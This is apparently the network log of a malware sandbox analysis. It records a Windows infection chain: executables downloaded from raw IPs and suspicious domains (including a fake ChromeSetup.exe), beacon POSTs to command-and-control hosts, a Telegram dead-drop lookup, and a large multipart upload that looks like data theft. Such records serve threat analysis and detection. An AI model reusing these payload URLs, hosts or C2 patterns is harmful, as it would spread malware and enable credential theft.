                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R7Ue2AuXeLzB%2B3ApPqNEIiTW%2FSH%2BB0rFkdhovO2qrZujEOHzDejHpmrXIvvHa2fWh15qZt4dreJOzlqfTpngkDezxGBpmg2TxRgqnLO0%2FPTrJgSngkzrDfZo%2BPERAI4p"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47f07ce928ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://puosdmiy.org/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 180
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:22 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=o4VZoVwg%2BKzrGuW7Rypz3R9Xs43CeVNkrRlkBG6i9g68SyqaWuWNCxBC4wsSXmH4WmaA0vCBEgYzAChXQCA43%2BOkgRh2wmwLX1jq26sNkglEVTL%2F92kEH1MC2J6U%2BaiN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d47f2bf7128ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://potunulit.org/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      188.114.96.0:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://elxxyb.net/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 190
                                                                                                                                                                      Host: potunulit.org
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:44 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=V8AVxPHxW2SvPpR%2BPkee5%2F2ZH71wJ7LNZUq3R0oPURGKf3Zi8z70hJOyW3cX0y28jmkp7yfyvX%2B8oWeuor2X1FIznR25upMY%2FGJGVmqGYfYdMVIHSW1EhQaDVKnQQY8N"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 786d48800f5428ad-AMS
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://194.110.203.101/puta/japanx86.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      194.110.203.101:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /puta/japanx86.exe HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Host: 194.110.203.101
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:17 GMT
                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                      Last-Modified: Mon, 09 Jan 2023 12:30:06 GMT
                                                                                                                                                                      ETag: "6aa00-5f1d3ed5e391b"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Length: 436736
                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      polyzi.com
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      polyzi.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      polyzi.com
                                                                                                                                                                      IN A
                                                                                                                                                                      95.217.49.230
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://polyzi.com/systems/ChromeSetup.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      95.217.49.230:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /systems/ChromeSetup.exe HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Host: polyzi.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:19 GMT
                                                                                                                                                                      Server: Apache
                                                                                                                                                                      Last-Modified: Mon, 09 Jan 2023 12:00:03 GMT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Length: 335360
                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      api.2ip.ua
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      api.2ip.ua
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      api.2ip.ua
                                                                                                                                                                      IN A
                                                                                                                                                                      162.0.217.254
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://api.2ip.ua/geo.json
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      162.0.217.254:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /geo.json HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: api.2ip.ua
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 429 Too Many Requests
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:32 GMT
                                                                                                                                                                      Server: Apache
                                                                                                                                                                      Strict-Transport-Security: max-age=63072000; preload
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block; report=...
                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                      Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                                      Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                      Connection: Upgrade
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://api.2ip.ua/geo.json
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      162.0.217.254:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /geo.json HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: api.2ip.ua
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 429 Too Many Requests
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:42 GMT
                                                                                                                                                                      Server: Apache
                                                                                                                                                                      Strict-Transport-Security: max-age=63072000; preload
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 1; mode=block; report=...
                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                      Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                                      Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                      Connection: Upgrade
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      uaery.top
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      uaery.top
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      spaceris.com
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      spaceris.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://uaery.top/dl/build2.exe
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.219.54.242:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /dl/build2.exe HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: uaery.top
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:43 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                                                                                      Last-Modified: Tue, 03 Jan 2023 08:55:47 GMT
                                                                                                                                                                      ETag: "6b600-5f1583be2faf8"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Length: 439808
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://spaceris.com/lancer/get.php?pid=A576FD670C4D34DE4BF0FF8DFDF7F163&first=true
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      195.158.3.162:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /lancer/get.php?pid=A576FD670C4D34DE4BF0FF8DFDF7F163&first=true HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: spaceris.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:42 GMT
                                                                                                                                                                      Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 563
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://spaceris.com/files/1/build3.exe
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      195.158.3.162:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /files/1/build3.exe HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: spaceris.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:47:46 GMT
                                                                                                                                                                      Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                                                                                                      Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT
                                                                                                                                                                      ETag: "2600-5c86757379380"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Length: 9728
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      t.me
                                                                                                                                                                      build2.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      t.me
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      t.me
                                                                                                                                                                      IN A
                                                                                                                                                                      149.154.167.99
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://t.me/year2023start
                                                                                                                                                                      build2.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      149.154.167.99:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /year2023start HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
                                                                                                                                                                      Host: t.me
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:04 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Content-Length: 12404
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Set-Cookie: stel_ssid=f2a07c4bbb1bf8f2bd_5880764152399388998; expires=Tue, 10 Jan 2023 12:48:04 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      Cache-control: no-store
                                                                                                                                                                      X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                      Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                      Strict-Transport-Security: max-age=35768000
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://49.12.113.110/19
                                                                                                                                                                      build2.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      49.12.113.110:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /19 HTTP/1.1
                                                                                                                                                                      Host: 49.12.113.110
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:05 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://49.12.113.110/samefiles.zip
                                                                                                                                                                      build2.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      49.12.113.110:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /samefiles.zip HTTP/1.1
                                                                                                                                                                      Host: 49.12.113.110
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:05 GMT
                                                                                                                                                                      Content-Type: application/zip
                                                                                                                                                                      Content-Length: 1565849
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Last-Modified: Fri, 01 Jul 2022 07:59:49 GMT
                                                                                                                                                                      ETag: "62bea975-17e499"
                                                                                                                                                                      Expires: Tue, 10 Jan 2023 12:48:05 GMT
                                                                                                                                                                      Cache-Control: max-age=86400
                                                                                                                                                                      X-Cache-Status: HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://49.12.113.110/
                                                                                                                                                                      build2.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      49.12.113.110:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----2612306240682792
                                                                                                                                                                      Host: 49.12.113.110
                                                                                                                                                                      Content-Length: 184864
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:08 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      vatra.at
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      vatra.at
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://lguaw.com/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 225
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:07 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://bphlkdtcpa.net/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 296
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:08 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://vluvbaj.net/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 125
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:09 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 43
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://146.19.173.115/sofos.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      146.19.173.115:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /sofos.exe HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Host: 146.19.173.115
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:10 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 1118208
                                                                                                                                                                      Last-Modified: Mon, 09 Jan 2023 12:40:01 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "63bc0b21-111000"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://uufmj.org/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 183
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:11 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://dtqksouqyq.net/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 286
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:12 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://gjpxk.net/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 181
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:13 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://fyrmc.org/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 328
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:14 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://bybohq.net/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 173
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:15 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://23.236.181.126/15xiW+BIFu4CehxXIK6zP9cptAUCnbfRJqwglaWndmvySgK+EsfJbDWQYoDabXLiA0AA7673OwpyOYw+FQqeHbMLrJdzu86qS79QKnsjLIn3L4o0tsF3JdWKzZ7/amDwXqbhezN2lNLEZHxs9BosLFKgb7F6vbEU10hcUTSZag06sZdlLBLPjkwSyA==
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      23.236.181.126:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /15xiW+BIFu4CehxXIK6zP9cptAUCnbfRJqwglaWndmvySgK+EsfJbDWQYoDabXLiA0AA7673OwpyOYw+FQqeHbMLrJdzu86qS79QKnsjLIn3L4o0tsF3JdWKzZ7/amDwXqbhezN2lNLEZHxs9BosLFKgb7F6vbEU10hcUTSZag06sZdlLBLPjkwSyA== HTTP/1.1
                                                                                                                                                                      Host: 23.236.181.126
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 200 OK
                                                                                                                                                                      Server: Apache/2.4.7 (Ubuntu)
